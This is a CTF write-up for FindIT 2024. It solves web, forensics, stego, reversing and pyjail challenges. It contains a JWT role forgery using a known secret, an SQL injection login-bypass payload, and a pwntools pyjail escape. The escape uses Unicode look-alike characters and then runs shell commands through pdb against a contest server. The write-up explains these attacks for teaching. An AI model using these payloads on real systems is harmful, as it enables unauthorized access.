FindIT 2024

Indonesian CTF by UGM (Universitas Gadjah Mada)

playing solo as N2L team

Kue

concept: basic jwt webex

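Tinggal edit role-nya dengan secret `your_secret`, ganti jadi admin. (The application signs its JWTs with the placeholder secret `your_secret`, so the signature does not protect the role claim; a long random secret kept out of the source closes this.)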

login-dulu

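concept: SQLi. We must supply the username admin and bypass the password check. The login query is evidently built by concatenating the submitted values, which is why a quote in the password field changes the query; a parameterized query removes the injection.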

Username: admin Password: " union select rootpage, type, name from sqlite_master --

reff :

bagas-dribble

concept: basic stego

tinggal strings nemu flagnya

file kosong

foren/file kosong

concept : finding pattern

# Paste the hex dump of the file here, as space-separated byte values.
s = """Hex FIlenya taruh sini"""
# Two whitespace bytes carry the message: E2 80 83 (UTF-8 for U+2003 EM SPACE)
# is read as bit 0 and 20 (plain space) as bit 1. The three-byte sequence is
# replaced first, then the separators between the hex bytes are dropped.
s = s.replace('E2 80 83', '0')
s = s.replace('20', '1')
s = s.replace(' ', '')
# Every group of 8 bits is one character of the hidden text.
for offset in range(0, len(s), 8):
    byte_bits = s[offset:offset + 8]
    print(chr(int(byte_bits, 2)), end='')

image cropper

concept : recover image from wav lsb decoding

import argparse
from PIL import Image
import numpy as np
import scipy.io.wavfile as wavfile
import base64

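def restore_image(wav_input_path):
    """Print the bit string hidden in the pixel values carried by a WAV file.

    The samples are read as interleaved R, G, B values, rescaled to bytes and
    arranged as a square RGB image. Each channel of each pixel yields one bit:
    "0" when red == 11, green == 11 or blue == 12 respectively, and "1" for
    every other value. The bits of the first 251 pixels are printed; nothing
    is printed for a smaller image. The image itself is not written to disk.

    Args:
        wav_input_path: path of the WAV file to decode.

    Raises:
        ValueError: raised by NumPy when the three channels differ in length
            or the pixel count is not a perfect square.
    """
    # The sample rate plays no part in the decoding.
    _sample_rate, audio_signal = wavfile.read(wav_input_path)

    # Samples are interleaved R, G, B, R, G, B, ...; rescale each channel to bytes.
    # NOTE(review): the (x + 1) / 2 * 255 mapping assumes float samples in
    # [-1, 1] - confirm against the encoder.
    channels = [
        ((audio_signal[offset::3] + 1) / 2 * 255).astype(np.uint8)
        for offset in range(3)
    ]

    # Arrange the pixels as a square image, as the original did, so a sample
    # count that does not fit still fails here instead of being decoded.
    image_size = int(np.sqrt(len(channels[0])))
    image_data = np.column_stack(channels).reshape((image_size, image_size, 3))

    # Only the first 251 pixels were ever printed, so decode just those
    # instead of growing a string over the whole image. The array is read
    # directly; a round trip through a PIL image returns the same values.
    printed_pixels = 251
    pixels = image_data.reshape(-1, 3)
    if len(pixels) >= printed_pixels:
        # Per channel, the one value that encodes a 0 bit. The former parity
        # tests and the 13/12/14 branches could not change the result.
        zero_values = np.array([11, 11, 12], dtype=np.uint8)
        is_zero = pixels[:printed_pixels] == zero_values
        print("".join("0" if flag else "1" for flag in is_zero.ravel()))

    print("Image restored successfully!")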

if __name__ == "__main__":
    # The WAV file is looked up in the current working directory.
    encoded_wav = "encoded.wav"
    restore_image(encoded_wav)

is_this_python

concept : reversing pyc

# Repeating XOR key (presumably recovered from the reversed .pyc).
key = '2024' + 'findit'

# Encoded flag, one integer per character.
flag_enc = [113, 100, 116, 79, 4, 89, 2, 80, 54, 66, 83, 92, 3, 107, 8, 80, 9, 11, 54, 16, 93, 1, 83, 90, 82, 7, 49, 80, 80, 71, 10, 1, 1, 73]

# Code points of the key characters.
key_arr = [ord(symbol) for symbol in key]

# flag_enc already holds integers, so int() leaves the values unchanged.
flag_arr = [int(value) for value in flag_enc]

# XOR every encoded value with the key value at the same position; the key
# wraps around because it is shorter than the flag.
flag_dec = [
    key_arr[position % len(key_arr)] ^ flag_arr[position]
    for position in range(len(flag_arr))
]

# Turn the code points back into text and show the result.
flag_dec_text = ''.join(chr(code) for code in flag_dec)
print(flag_dec_text)

your-journey

concept : pyjail restriction bypass using unique (Unicode look-alike) characters

from pwn import *
# Only errors are logged by pwntools.
context.log_level="ERROR"
host, port = "103.191.63.187", 1337  # Change IP and PORT
io = remote(host, port)
# The builtin name is written with mathematical italic letters. Python
# NFKC-normalises identifiers, so this resolves to the ASCII name while a
# filter that compares the raw input text (presumably what the jail does)
# does not match it. A filter has to normalise its input before comparing,
# and a keyword blocklist is not a sandbox in any case.
jail_input = '𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵'.encode()
io.sendlineafter(b"$ ", jail_input)
# At the debugger prompt, search the working directory for the flag prefix.
pdb_command = b"import os;os.system('grep -ra \"FindIT\"')"
io.sendlineafter(b"(Pdb) ", pdb_command)
print(io.recv().decode())

how to decrypte?

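def caesar_decrypt(ciphertext, shift=4):
    """Undo a Caesar shift on the ASCII letters of *ciphertext*.

    Letters A-Z and a-z are rotated back by *shift* positions within their
    own case. Every other character, including digits, punctuation and
    non-ASCII letters, is copied unchanged.

    Args:
        ciphertext: text to decrypt.
        shift: number of positions the plaintext was shifted forward by;
            defaults to 4, the value this script was written for.

    Returns:
        The decrypted text.
    """
    decoded = []
    for char in ciphertext:
        # str.isalpha() also accepts non-ASCII letters, for which the
        # 26-letter arithmetic below would produce unrelated characters,
        # so the ranges are tested explicitly.
        if 'A' <= char <= 'Z':
            base = ord('A')
        elif 'a' <= char <= 'z':
            base = ord('a')
        else:
            decoded.append(char)
            continue
        decoded.append(chr((ord(char) - base - shift) % 26 + base))
    # Joining once avoids repeated string concatenation.
    return "".join(decoded)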

# Ciphertext to decode (presumably the string handed out by the challenge).
encrypted_flag = "JmrhMXGXJ{al4x_h03w_G43w4v_Hs_57lnkrzh8x5}"
print(caesar_decrypt(encrypted_flag))

neobim

import httpx

# Default base URL handed to the HTTP client; relative request paths are
# resolved against it.
URL = "https://discordapp.com/"

class BaseAPI:
    """Small httpx wrapper for the application-asset endpoints used below."""

    def __init__(self, url=URL) -> None:
        """Create the shared client; *url* is the base for relative paths."""
        # Redirects are followed automatically on every request.
        self.c = httpx.Client(follow_redirects=True, base_url=url)

    def get_assets(self, appid):
        """Request the asset list of application *appid*; return the response."""
        endpoint = f"/api/oauth2/applications/{appid}/assets"
        return self.c.get(endpoint)

    def get_asset(self, appid, assetid):
        """Request one asset as PNG from the CDN host; return the response."""
        # Absolute URL: the CDN is a different host than the client's base URL.
        asset_url = f"https://cdn.discordapp.com/app-assets/{appid}/{assetid}.png"
        return self.c.get(asset_url)

class API(BaseAPI):
    """Client used by the script; adds nothing to BaseAPI."""

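if __name__ == "__main__":
    import os  # only the script entry point needs it

    api = API()
    appid = "1233467180696207390"
    listing = api.get_assets(appid)
    # Stop on an error response instead of iterating over an error payload.
    listing.raise_for_status()
    for index, asset in enumerate(listing.json()):
        download = api.get_asset(appid, asset["id"])
        download.raise_for_status()
        # asset["name"] is supplied by the remote service. Keep only its last
        # path component so the file is always created in the working
        # directory, whatever separators or "../" parts the name contains.
        safe_name = os.path.basename(str(asset["name"]).replace("\\", "/"))
        if not safe_name:
            safe_name = f"asset_{index}"
        with open(safe_name + ".png", "wb") as f:
            f.write(download.content)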

get the appid in the readme
